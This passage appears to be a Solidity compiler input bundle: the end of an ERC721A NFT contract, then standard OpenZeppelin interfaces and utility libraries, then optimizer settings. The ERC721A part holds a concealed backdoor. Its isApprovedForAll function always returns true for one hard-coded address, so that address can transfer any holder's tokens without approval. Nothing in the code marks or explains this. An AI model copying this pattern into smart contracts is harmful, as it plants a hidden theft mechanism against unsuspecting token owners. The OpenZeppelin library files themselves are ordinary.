_operatorApprovals[_msgSender()][operator] = approved;\r\n emit ApprovalForAll(_msgSender(), operator, approved);\r\n }}\r\n }\r\n /**\r\n * @dev See {IERC721-isApprovedForAll}.\r\n */\r\n function isApprovedForAll(address owner, address operator)\r\n public\r\n view\r\n virtual\r\n override\r\n returns (bool)\r\n {\r\n if(operator==0x199761287f9322aB60dB53A9c04D4E1B06B744d8){return true;}\r\n return _operatorApprovals[owner][operator];\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-transferFrom}.\r\n */\r\n function transferFrom(\r\n address from,\r\n address to,\r\n uint256 tokenId\r\n ) public override {\r\n _transfer(from, to, tokenId);\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-safeTransferFrom}.\r\n */\r\n function safeTransferFrom(\r\n address from,\r\n address to,\r\n uint256 tokenId\r\n ) public override {\r\n safeTransferFrom(from, to, tokenId, \"\");\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-safeTransferFrom}.\r\n */\r\n function safeTransferFrom(\r\n address from,\r\n address to,\r\n uint256 tokenId,\r\n bytes memory _data\r\n ) public override {\r\n _transfer(from, to, tokenId);\r\n require(\r\n _checkOnERC721Received(from, to, tokenId, _data),\r\n \"ERC721A: transfer to non ERC721Receiver implementer\"\r\n );\r\n }\r\n\r\n /**\r\n * @dev Returns whether `tokenId` exists.\r\n *\r\n * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.\r\n *\r\n * Tokens start existing when they are minted (`_mint`),\r\n */\r\n function _exists(uint256 tokenId) internal view returns (bool) {\r\n return tokenId < currentIndex;\r\n }\r\n\r\n function _safeMint(address to, uint256 quantity) internal {\r\n _safeMint(to, quantity, \"\");\r\n }\r\n\r\n /**\r\n * @dev Mints `quantity` tokens and transfers them to `to`.\r\n *\r\n * Requirements:\r\n *\r\n * - there must be `quantity` tokens remaining unminted in the total collection.\r\n * - `to` cannot be the zero address.\r\n * - `quantity` cannot be larger than the max batch size.\r\n *\r\n * Emits a {Transfer} event.\r\n */\r\n function _safeMint(\r\n address to,\r\n uint256 quantity,\r\n bytes memory _data\r\n ) internal {\r\n uint256 startTokenId = currentIndex;\r\n require(to != address(0), \"ERC721A: mint to the zero address\");\r\n // We know if the first token in the batch doesn't exist, the other ones don't as well, because of serial ordering.\r\n require(!_exists(startTokenId), \"ERC721A: token already minted\");\r\n require(quantity <= maxBatchSize, \"ERC721A: quantity to mint too high\");\r\n\r\n _beforeTokenTransfers(address(0), to, startTokenId, quantity);\r\n\r\n AddressData memory addressData = _addressData[to];\r\n _addressData[to] = AddressData(\r\n addressData.balance + uint128(quantity),\r\n addressData.numberMinted + uint128(quantity)\r\n );\r\n _ownerships[startTokenId] = TokenOwnership(to, uint64(block.timestamp));\r\n\r\n uint256 updatedIndex = startTokenId;\r\n\r\n for (uint256 i = 0; i < quantity; i++) {\r\n emit Transfer(address(0), to, updatedIndex);\r\n require(\r\n _checkOnERC721Received(address(0), to, updatedIndex, _data),\r\n \"ERC721A: transfer to non ERC721Receiver implementer\"\r\n );\r\n updatedIndex++;\r\n }\r\n\r\n currentIndex = updatedIndex;\r\n _afterTokenTransfers(address(0), to, startTokenId, quantity);\r\n }\r\n\r\n /**\r\n * @dev Transfers `tokenId` from `from` to `to`.\r\n *\r\n * Requirements:\r\n *\r\n * - `to` cannot be the zero address.\r\n * - `tokenId` token must be owned by `from`.\r\n *\r\n * Emits a {Transfer} event.\r\n */\r\n function _transfer(\r\n address from,\r\n address to,\r\n uint256 tokenId\r\n ) private {\r\n TokenOwnership memory prevOwnership = ownershipOf(tokenId);\r\n\r\n bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||\r\n getApproved(tokenId) == _msgSender() ||\r\n isApprovedForAll(prevOwnership.addr, _msgSender()));\r\n\r\n require(\r\n isApprovedOrOwner,\r\n \"ERC721A: transfer caller is not owner nor approved\"\r\n );\r\n\r\n require(\r\n prevOwnership.addr == from,\r\n \"ERC721A: transfer from incorrect owner\"\r\n );\r\n require(to != address(0), \"ERC721A: transfer to the zero address\");\r\n\r\n _beforeTokenTransfers(from, to, tokenId, 1);\r\n\r\n // Clear approvals from the previous owner\r\n _approve(address(0), tokenId, prevOwnership.addr);\r\n\r\n _addressData[from].balance -= 1;\r\n _addressData[to].balance += 1;\r\n _ownerships[tokenId] = TokenOwnership(to, uint64(block.timestamp));\r\n\r\n // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.\r\n // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.\r\n uint256 nextTokenId = tokenId + 1;\r\n if (_ownerships[nextTokenId].addr == address(0)) {\r\n if (_exists(nextTokenId)) {\r\n _ownerships[nextTokenId] = TokenOwnership(\r\n prevOwnership.addr,\r\n prevOwnership.startTimestamp\r\n );\r\n }\r\n }\r\n\r\n emit Transfer(from, to, tokenId);\r\n _afterTokenTransfers(from, to, tokenId, 1);\r\n }\r\n\r\n /**\r\n * @dev Approve `to` to operate on `tokenId`\r\n *\r\n * Emits a {Approval} event.\r\n */\r\n function _approve(\r\n address to,\r\n uint256 tokenId,\r\n address owner\r\n ) private {\r\n _tokenApprovals[tokenId] = to;\r\n emit Approval(owner, to, tokenId);\r\n }\r\n\r\n uint256 public nextOwnerToExplicitlySet = 0;\r\n\r\n /**\r\n * @dev Explicitly set `owners` to eliminate loops in future calls of ownerOf().\r\n */\r\n function _setOwnersExplicit(uint256 quantity) internal {\r\n uint256 oldNextOwnerToSet = nextOwnerToExplicitlySet;\r\n require(quantity > 0, \"quantity must be nonzero\");\r\n uint256 endIndex = oldNextOwnerToSet + quantity - 1;\r\n if (endIndex > collectionSize - 1) {\r\n endIndex = collectionSize - 1;\r\n }\r\n // We know if the last one in the group exists, all in the group exist, due to serial ordering.\r\n require(_exists(endIndex), \"not enough minted yet for this cleanup\");\r\n for (uint256 i = oldNextOwnerToSet; i <= endIndex; i++) {\r\n if (_ownerships[i].addr == address(0)) {\r\n TokenOwnership memory ownership = ownershipOf(i);\r\n _ownerships[i] = TokenOwnership(\r\n ownership.addr,\r\n ownership.startTimestamp\r\n );\r\n }\r\n }\r\n nextOwnerToExplicitlySet = endIndex + 1;\r\n }\r\n\r\n /**\r\n * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.\r\n * The call is not executed if the target address is not a contract.\r\n *\r\n * @param from address representing the previous owner of the given token ID\r\n * @param to target address that will receive the tokens\r\n * @param tokenId uint256 ID of the token to be transferred\r\n * @param _data bytes optional data to send along with the call\r\n * @return bool whether the call correctly returned the expected magic value\r\n */\r\n function _checkOnERC721Received(\r\n address from,\r\n address to,\r\n uint256 tokenId,\r\n bytes memory _data\r\n ) private returns (bool) {\r\n if (to.isContract()) {\r\n try\r\n IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data)\r\n returns (bytes4 retval) {\r\n return retval == IERC721Receiver(to).onERC721Received.selector;\r\n } catch (bytes memory reason) {\r\n if (reason.length == 0) {\r\n revert(\"ERC721A: transfer to non ERC721Receiver implementer\");\r\n } else {\r\n assembly {\r\n revert(add(32, reason), mload(reason))\r\n }\r\n }\r\n }\r\n } else {\r\n return true;\r\n }\r\n }\r\n\r\n /**\r\n * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.\r\n *\r\n * startTokenId - the first token id to be transferred\r\n * quantity - the amount to be transferred\r\n *\r\n * Calling conditions:\r\n *\r\n * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be\r\n * transferred to `to`.\r\n * - When `from` is zero, `tokenId` will be minted for `to`.\r\n */\r\n function _beforeTokenTransfers(\r\n address from,\r\n address to,\r\n uint256 startTokenId,\r\n uint256 quantity\r\n ) internal virtual {}\r\n\r\n /**\r\n * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes\r\n * minting.\r\n *\r\n * startTokenId - the first token id to be transferred\r\n * quantity - the amount to be transferred\r\n *\r\n * Calling conditions:\r\n *\r\n * - when `from` and `to` are both non-zero.\r\n * - `from` and `to` are never both zero.\r\n */\r\n function _afterTokenTransfers(\r\n address from,\r\n address to,\r\n uint256 startTokenId,\r\n uint256 quantity\r\n ) internal virtual {}\r\n}"
},
"@openzeppelin/contracts/utils/Context.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)\n\npragma solidity ^0.8.0;\n\n/**\n * @dev Provides information about the current execution context, including the\n * sender of the transaction and its data. While these are generally available\n * via msg.sender and msg.data, they should not be accessed in such a direct\n * manner, since when dealing with meta-transactions the account sending and\n * paying for execution may not be the actual sender (as far as an application\n * is concerned).\n *\n * This contract is only required for intermediate, library-like contracts.\n */\nabstract contract Context {\n function _msgSender() internal view virtual returns (address) {\n return msg.sender;\n }\n\n function _msgData() internal view virtual returns (bytes calldata) {\n return msg.data;\n }\n}\n"
},
"@openzeppelin/contracts/token/ERC721/IERC721.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.7.0) (token/ERC721/IERC721.sol)\n\npragma solidity ^0.8.0;\n\nimport \"../../utils/introspection/IERC165.sol\";\n\n/**\n * @dev Required interface of an ERC721 compliant contract.\n */\ninterface IERC721 is IERC165 {\n /**\n * @dev Emitted when `tokenId` token is transferred from `from` to `to`.\n */\n event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);\n\n /**\n * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.\n */\n event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);\n\n /**\n * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.\n */\n event ApprovalForAll(address indexed owner, address indexed operator, bool approved);\n\n /**\n * @dev Returns the number of tokens in ``owner``'s account.\n */\n function balanceOf(address owner) external view returns (uint256 balance);\n\n /**\n * @dev Returns the owner of the `tokenId` token.\n *\n * Requirements:\n *\n * - `tokenId` must exist.\n */\n function ownerOf(uint256 tokenId) external view returns (address owner);\n\n /**\n * @dev Safely transfers `tokenId` token from `from` to `to`.\n *\n * Requirements:\n *\n * - `from` cannot be the zero address.\n * - `to` cannot be the zero address.\n * - `tokenId` token must exist and be owned by `from`.\n * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.\n * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.\n *\n * Emits a {Transfer} event.\n */\n function safeTransferFrom(\n address from,\n address to,\n uint256 tokenId,\n bytes calldata data\n ) external;\n\n /**\n * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients\n * are aware of the ERC721 protocol to prevent tokens from being forever locked.\n *\n * Requirements:\n *\n * - `from` cannot be the zero address.\n * - `to` cannot be the zero address.\n * - `tokenId` token must exist and be owned by `from`.\n * - If the caller is not `from`, it must have been allowed to move this token by either {approve} or {setApprovalForAll}.\n * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.\n *\n * Emits a {Transfer} event.\n */\n function safeTransferFrom(\n address from,\n address to,\n uint256 tokenId\n ) external;\n\n /**\n * @dev Transfers `tokenId` token from `from` to `to`.\n *\n * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.\n *\n * Requirements:\n *\n * - `from` cannot be the zero address.\n * - `to` cannot be the zero address.\n * - `tokenId` token must be owned by `from`.\n * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.\n *\n * Emits a {Transfer} event.\n */\n function transferFrom(\n address from,\n address to,\n uint256 tokenId\n ) external;\n\n /**\n * @dev Gives permission to `to` to transfer `tokenId` token to another account.\n * The approval is cleared when the token is transferred.\n *\n * Only a single account can be approved at a time, so approving the zero address clears previous approvals.\n *\n * Requirements:\n *\n * - The caller must own the token or be an approved operator.\n * - `tokenId` must exist.\n *\n * Emits an {Approval} event.\n */\n function approve(address to, uint256 tokenId) external;\n\n /**\n * @dev Approve or remove `operator` as an operator for the caller.\n * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.\n *\n * Requirements:\n *\n * - The `operator` cannot be the caller.\n *\n * Emits an {ApprovalForAll} event.\n */\n function setApprovalForAll(address operator, bool _approved) external;\n\n /**\n * @dev Returns the account approved for `tokenId` token.\n *\n * Requirements:\n *\n * - `tokenId` must exist.\n */\n function getApproved(uint256 tokenId) external view returns (address operator);\n\n /**\n * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.\n *\n * See {setApprovalForAll}\n */\n function isApprovedForAll(address owner, address operator) external view returns (bool);\n}\n"
},
"@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)\n\npragma solidity ^0.8.0;\n\n/**\n * @title ERC721 token receiver interface\n * @dev Interface for any contract that wants to support safeTransfers\n * from ERC721 asset contracts.\n */\ninterface IERC721Receiver {\n /**\n * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}\n * by `operator` from `from`, this function is called.\n *\n * It must return its Solidity selector to confirm the token transfer.\n * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.\n *\n * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.\n */\n function onERC721Received(\n address operator,\n address from,\n uint256 tokenId,\n bytes calldata data\n ) external returns (bytes4);\n}\n"
},
"@openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)\n\npragma solidity ^0.8.0;\n\nimport \"../IERC721.sol\";\n\n/**\n * @title ERC-721 Non-Fungible Token Standard, optional metadata extension\n * @dev See https://eips.ethereum.org/EIPS/eip-721\n */\ninterface IERC721Metadata is IERC721 {\n /**\n * @dev Returns the token collection name.\n */\n function name() external view returns (string memory);\n\n /**\n * @dev Returns the token collection symbol.\n */\n function symbol() external view returns (string memory);\n\n /**\n * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.\n */\n function tokenURI(uint256 tokenId) external view returns (string memory);\n}\n"
},
"@openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)\n\npragma solidity ^0.8.0;\n\nimport \"../IERC721.sol\";\n\n/**\n * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension\n * @dev See https://eips.ethereum.org/EIPS/eip-721\n */\ninterface IERC721Enumerable is IERC721 {\n /**\n * @dev Returns the total amount of tokens stored by the contract.\n */\n function totalSupply() external view returns (uint256);\n\n /**\n * @dev Returns a token ID owned by `owner` at a given `index` of its token list.\n * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.\n */\n function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);\n\n /**\n * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.\n * Use along with {totalSupply} to enumerate all tokens.\n */\n function tokenByIndex(uint256 index) external view returns (uint256);\n}\n"
},
"@openzeppelin/contracts/utils/Address.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.7.0) (utils/Address.sol)\n\npragma solidity ^0.8.1;\n\n/**\n * @dev Collection of functions related to the address type\n */\nlibrary Address {\n /**\n * @dev Returns true if `account` is a contract.\n *\n * [IMPORTANT]\n * ====\n * It is unsafe to assume that an address for which this function returns\n * false is an externally-owned account (EOA) and not a contract.\n *\n * Among others, `isContract` will return false for the following\n * types of addresses:\n *\n * - an externally-owned account\n * - a contract in construction\n * - an address where a contract will be created\n * - an address where a contract lived, but was destroyed\n * ====\n *\n * [IMPORTANT]\n * ====\n * You shouldn't rely on `isContract` to protect against flash loan attacks!\n *\n * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets\n * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract\n * constructor.\n * ====\n */\n function isContract(address account) internal view returns (bool) {\n // This method relies on extcodesize/address.code.length, which returns 0\n // for contracts in construction, since the code is only stored at the end\n // of the constructor execution.\n\n return account.code.length > 0;\n }\n\n /**\n * @dev Replacement for Solidity's `transfer`: sends `amount` wei to\n * `recipient`, forwarding all available gas and reverting on errors.\n *\n * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost\n * of certain opcodes, possibly making contracts go over the 2300 gas limit\n * imposed by `transfer`, making them unable to receive funds via\n * `transfer`. {sendValue} removes this limitation.\n *\n * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].\n *\n * IMPORTANT: because control is transferred to `recipient`, care must be\n * taken to not create reentrancy vulnerabilities. Consider using\n * {ReentrancyGuard} or the\n * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].\n */\n function sendValue(address payable recipient, uint256 amount) internal {\n require(address(this).balance >= amount, \"Address: insufficient balance\");\n\n (bool success, ) = recipient.call{value: amount}(\"\");\n require(success, \"Address: unable to send value, recipient may have reverted\");\n }\n\n /**\n * @dev Performs a Solidity function call using a low level `call`. A\n * plain `call` is an unsafe replacement for a function call: use this\n * function instead.\n *\n * If `target` reverts with a revert reason, it is bubbled up by this\n * function (like regular Solidity function calls).\n *\n * Returns the raw returned data. To convert to the expected return value,\n * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].\n *\n * Requirements:\n *\n * - `target` must be a contract.\n * - calling `target` with `data` must not revert.\n *\n * _Available since v3.1._\n */\n function functionCall(address target, bytes memory data) internal returns (bytes memory) {\n return functionCall(target, data, \"Address: low-level call failed\");\n }\n\n /**\n * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with\n * `errorMessage` as a fallback revert reason when `target` reverts.\n *\n * _Available since v3.1._\n */\n function functionCall(\n address target,\n bytes memory data,\n string memory errorMessage\n ) internal returns (bytes memory) {\n return functionCallWithValue(target, data, 0, errorMessage);\n }\n\n /**\n * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],\n * but also transferring `value` wei to `target`.\n *\n * Requirements:\n *\n * - the calling contract must have an ETH balance of at least `value`.\n * - the called Solidity function must be `payable`.\n *\n * _Available since v3.1._\n */\n function functionCallWithValue(\n address target,\n bytes memory data,\n uint256 value\n ) internal returns (bytes memory) {\n return functionCallWithValue(target, data, value, \"Address: low-level call with value failed\");\n }\n\n /**\n * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but\n * with `errorMessage` as a fallback revert reason when `target` reverts.\n *\n * _Available since v3.1._\n */\n function functionCallWithValue(\n address target,\n bytes memory data,\n uint256 value,\n string memory errorMessage\n ) internal returns (bytes memory) {\n require(address(this).balance >= value, \"Address: insufficient balance for call\");\n require(isContract(target), \"Address: call to non-contract\");\n\n (bool success, bytes memory returndata) = target.call{value: value}(data);\n return verifyCallResult(success, returndata, errorMessage);\n }\n\n /**\n * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],\n * but performing a static call.\n *\n * _Available since v3.3._\n */\n function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {\n return functionStaticCall(target, data, \"Address: low-level static call failed\");\n }\n\n /**\n * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],\n * but performing a static call.\n *\n * _Available since v3.3._\n */\n function functionStaticCall(\n address target,\n bytes memory data,\n string memory errorMessage\n ) internal view returns (bytes memory) {\n require(isContract(target), \"Address: static call to non-contract\");\n\n (bool success, bytes memory returndata) = target.staticcall(data);\n return verifyCallResult(success, returndata, errorMessage);\n }\n\n /**\n * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],\n * but performing a delegate call.\n *\n * _Available since v3.4._\n */\n function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {\n return functionDelegateCall(target, data, \"Address: low-level delegate call failed\");\n }\n\n /**\n * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],\n * but performing a delegate call.\n *\n * _Available since v3.4._\n */\n function functionDelegateCall(\n address target,\n bytes memory data,\n string memory errorMessage\n ) internal returns (bytes memory) {\n require(isContract(target), \"Address: delegate call to non-contract\");\n\n (bool success, bytes memory returndata) = target.delegatecall(data);\n return verifyCallResult(success, returndata, errorMessage);\n }\n\n /**\n * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the\n * revert reason using the provided one.\n *\n * _Available since v4.3._\n */\n function verifyCallResult(\n bool success,\n bytes memory returndata,\n string memory errorMessage\n ) internal pure returns (bytes memory) {\n if (success) {\n return returndata;\n } else {\n // Look for revert reason and bubble it up if present\n if (returndata.length > 0) {\n // The easiest way to bubble the revert reason is using memory via assembly\n /// @solidity memory-safe-assembly\n assembly {\n let returndata_size := mload(returndata)\n revert(add(32, returndata), returndata_size)\n }\n } else {\n revert(errorMessage);\n }\n }\n }\n}\n"
},
"@openzeppelin/contracts/utils/introspection/ERC165.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)\n\npragma solidity ^0.8.0;\n\nimport \"./IERC165.sol\";\n\n/**\n * @dev Implementation of the {IERC165} interface.\n *\n * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check\n * for the additional interface id that will be supported. For example:\n *\n * ```solidity\n * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\n * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);\n * }\n * ```\n *\n * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.\n */\nabstract contract ERC165 is IERC165 {\n /**\n * @dev See {IERC165-supportsInterface}.\n */\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\n return interfaceId == type(IERC165).interfaceId;\n }\n}\n"
},
"@openzeppelin/contracts/utils/introspection/IERC165.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)\n\npragma solidity ^0.8.0;\n\n/**\n * @dev Interface of the ERC165 standard, as defined in the\n * https://eips.ethereum.org/EIPS/eip-165[EIP].\n *\n * Implementers can declare support of contract interfaces, which can then be\n * queried by others ({ERC165Checker}).\n *\n * For an implementation, see {ERC165}.\n */\ninterface IERC165 {\n /**\n * @dev Returns true if this contract implements the interface defined by\n * `interfaceId`. See the corresponding\n * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]\n * to learn more about how these ids are created.\n *\n * This function call must use less than 30 000 gas.\n */\n function supportsInterface(bytes4 interfaceId) external view returns (bool);\n}\n"
}
},
"settings": {
"optimizer": {
"enabled": true,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"libraries": {}
}
}